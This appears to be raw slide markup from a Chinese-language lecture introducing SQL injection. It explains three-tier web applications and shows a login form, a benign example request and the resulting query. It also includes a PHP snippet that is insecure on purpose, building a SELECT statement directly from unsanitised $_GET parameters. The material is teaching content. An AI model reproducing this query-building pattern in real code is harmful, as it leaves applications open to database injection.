              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Oracle</a:t>
              </a:r>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等数据库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN"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42" name="直接连接符 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD86036-F9AE-488F-A214-C9D51E03E7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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3" name="组合 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBA950D-B167-4101-AF3D-E241FEE7F690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="4286623"/>
              <a:ext cx="963155" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="963155" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="六边形 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ED0627-3ADF-4A85-B852-AE46A28AD453}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="矩形 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C37C18E-AA00-4C05-A2AC-1A723AF3F689}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2366496" y="2887049"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <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rPr>
                  <a:t>存储层</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D8EA6C-229E-408E-B5E0-541128E1AAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1230579" y="2613018"/>
            <a:ext cx="2275030" cy="2275030"/>
            <a:chOff x="1230579" y="2525851"/>
            <a:chExt cx="2275030" cy="2275030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9521A46-D655-417E-87AF-9CC56AE07432}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1230579" y="2525851"/>
              <a:ext cx="2275030" cy="2275030"/>
              <a:chOff x="2716147" y="2106202"/>
              <a:chExt cx="1622946" cy="1622946"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD24D2F1-4E30-48FF-A92A-855775512DC3}"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A60171D-E000-415A-A944-B00D62F27FB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2828972" y="2219027"/>
                <a:ext cx="1397296" cy="1397296"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="1092F1"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="1092F1"/>
                </a:solidFill>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
                <a:normAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F855D2D5-81D1-4063-AF7E-D399680D43DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536709" y="3198308"/>
              <a:ext cx="1872640" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>数据库驱动的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>应用通常包含三层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0BECE1-7A25-4E57-96D9-381E0444CF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143020" y="5447023"/>
            <a:ext cx="10572710" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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浏览器（表示层）向中间层（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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服务器）发送请求，中间层通过查询、更新数据库（存储层）来响应该请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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当用户通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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表单提交数据时，如果输入框的值没有经过有效性检查，则这些数据将会作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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查询的一部分。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3892491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21" presetClass="entr" presetSubtype="1"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="8"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="22" presetClass="entr" presetSubtype="8"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par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="8" fill="hold"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">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17">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="17">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36"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595739" y="837929"/>
            <a:ext cx="3667280" cy="474140"/>
            <a:chOff x="5071056" y="837929"/>
            <a:chExt cx="2716641"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例如</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95947858-2762-4BDD-87C5-A75A77F7048B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684960" y="1456085"/>
            <a:ext cx="4680519"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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>如果一个网页的表单通过如下代码实现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CAADFC-AF19-403A-8FDD-4CC67175A35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684960" y="3688333"/>
            <a:ext cx="1910779" cy="576064"/>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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>核心代码如下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47B5DA6-6FEE-4A82-9FE4-BF875B2B508F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2684960" y="2040222"/>
          <a:ext cx="7492755" cy="1485050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7492755">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1485050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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&lt;form action=”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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xxx.php”method</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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=”GET”&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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&lt;input type=”text” name=”user”/&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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&lt;input type=”text” name=”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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passwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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”&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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&lt;input type=”submit”/&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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&lt;/form&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86402" marR="86402" marT="43201" marB="43201">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C512DC96-F7E3-4A87-90FA-1149395927CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2684959" y="4264397"/>
          <a:ext cx="7492755" cy="2326682"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7492755">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2304062">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr 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sz="21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php</a:t>
                      </a:r>
                      <a:endParaRPr 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sz="2100" b="1" kern="1200"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100" b="1" kern="1200" dirty="0" err="1">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sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2100" b="1" kern="1200"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="select * from table where user=$_GET[“user”] and password=$_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2100" b="1" kern="1200" dirty="0" err="1">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passwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2100" b="1" kern="1200"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$result=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="21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mysql_query</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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1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sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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执行查询</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"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?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86402" marR="86402" marT="43201" marB="43201">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04772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 presetClass="entr" presetSubtype="8" decel="6000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up)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="8" decel="60000"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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>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2" presetClass="entr" presetSubtype="1"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矩形 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6043767-DC6B-4254-9127-2CD5CBDB1CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="1168053"/>
            <a:ext cx="10099988" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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当用户通过浏览器向表单提交了用户名“</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bob</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，密码“</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abc123</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时，那么下面的</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查询将被发送给</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服务器：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形: 圆角 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90B07EA-DD91-43AC-AECD-8FD0842C981A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108609" y="2392189"/>
            <a:ext cx="8641531" cy="720080"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://xxxx.com/xxx.php?user=bob&amp;passwd=abc123</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矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F243DCF9-ACE8-4A55-9E6E-9AB55C96D880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="3616325"/>
            <a:ext cx="10099988" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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当</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服务器收到这个请求时，将构建并执行一条（发送给数据库服务器的）</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查询。在这个示例中，该</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请求如下所示：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形: 圆角 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D07460-D97C-473F-8990-E2D4A357AA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="4840461"/>
            <a:ext cx="10560496" cy="720080"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM table WHERE user=’bob’ and password=’abc123’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1800225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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="42" presetClass="entr" presetSubtype="0"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strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="5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24" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
